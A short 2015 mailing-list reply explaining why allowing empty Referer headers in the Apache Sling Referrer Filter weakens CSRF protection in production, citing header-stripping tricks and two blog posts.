Hello Daniel
On 28.05.2015 10:11, Daniel Sungjin Jung wrote:
Checking “Allow Empty” checkbox in Apache Sling Referrer Filter is not
recommended in production service.
I’d like to know what specific security risks we face if we turn it on for
production service.
Apart from the obvious cases (bugs in browser/plugins, MitM) which allow
for HTTP header manipulation but often allow complete circumvention of
CSRF protections anyway, there have been several cases where it was
possible to strip the referrer header client-side using some tricks with
javascript and iframes (e.g. [0], [1]).
Best greetings
Lars
[0]
http://homakov.blogspot.com/2012/04/playing-with-referer-origin-disquscom.html
[1]
http://webstersprodigy.net/2013/02/01/stripping-the-referer-in-a-cross-domain-post-request/